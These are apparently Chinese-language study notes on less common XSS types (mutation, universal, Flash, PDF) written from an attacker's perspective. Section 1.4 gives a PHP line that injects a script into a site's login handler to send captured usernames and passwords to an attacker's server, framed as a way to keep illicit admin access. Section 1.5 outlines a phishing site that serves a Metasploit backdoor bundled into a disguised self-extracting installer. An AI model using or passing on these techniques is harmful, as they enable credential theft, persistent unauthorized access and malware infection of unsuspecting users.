xss基础知识2.0
xss基础知识2.0
前言:之前我们分析的都是反射型xss,存储型xss,和dom型xss,今天来学习下别的类型
1.0 mxss
mxss是突变型xss,指最初提交的payload并不会直接产生xss,而是由于一些特殊原因,导
致payload发生编译,导致 的xss,比如早期qq的预览功能导致博客园对原本过滤失效导致的
xss
1.1 uxss
uxss利用浏览器或者浏览器扩展制造产生xss并装逼行代码的攻击类型,例子是CVE2021-
34506,该漏洞出现于一版本的edge浏览器中,具体的利用为任何地方只要搜索跨站语句,
启用翻译功能翻译页面后,就会出现xss。
1.2 Flash xss
首先我们要认识一下swf,swf是适用于flash的专用文件格式,用于网页,动画制作。在swf
文件中可以调用js代码并执行,在js中也可以调用swf代码并执行。
swf文件内容正常是编译过的,我们想要查看源代码需要使用swf反编译,使用比如JPEXS
在swf中执行js代码的函数为ExternalInterface 我们在swf文件中通过寻找该函数判断是否存在
xss注入点,如果ExternalInterface的参数中存在可控变量,便产生了xss注入。
我们实际去利用过程便是搜索包存在swf文件的网站,然后利用插件将其下载下来,反编译其代码
进行利用。
1.3 pdf xss
在pdf中是可以运行javascript代码的,我们在pdf编辑器中添加可运行的js代码,大部分浏览器打开
pdf文件时会触发js代码,我们将pdf文件上传到某网站,然后访问上传上去的pdf的url,如果网站
设置访问后是预览模式且没有过滤,即可触发xss,我们利用该url可以进行xss攻击。
1.4 xss后台植入cookie,表单劫持
当我们在网站后台写入后门或者获取管理员账户密码后,很可能过段时间后门会被删除或者密码会被
修改,我们怎么去维持管理员权限呢?我们获取到后台权限后,在后台登陆页面插入获得
cookie的js代码,即使后门被删除或者管理员密码发生更改,我们仍然能获取新的管理员密
码,从而达到权限维持的结果。
但是有些网站对cookie有过滤,导致我们获取cookie不全,这时候就要利用另一种方式去获
去表单密码了。
我们先去后台查看登陆页面的代码,查看表单发送账号密码的目标文件
然后在接受账号密码的文件中加入账号密码发送代码,比如这个
$up="<script src=你的服务器地址/本地接受文件?密码=接受到的密码&账号=接收到的账号></script>";
echo $up;
这样就可以让该script语句执行从而获取到账号和密码。
1.5 XSS Flash钓鱼配合MSF捆绑上线
首先用相似域名搭建伪造flash官方网站,在下载连接处放自己的后门,用户下载安装后在安
装正常软件的过程中同时允许后门,用MSF制作该文件,用解压缩软件制作.exe,设置文件的
允许次序后更改.exe图标像正常文件靠拢。在压缩设置时设置自解压路径和解压后自动打开后
门,这样目标安装时就会启动后门了。具体还得涉及后门的免杀,这就需要以后的学习了。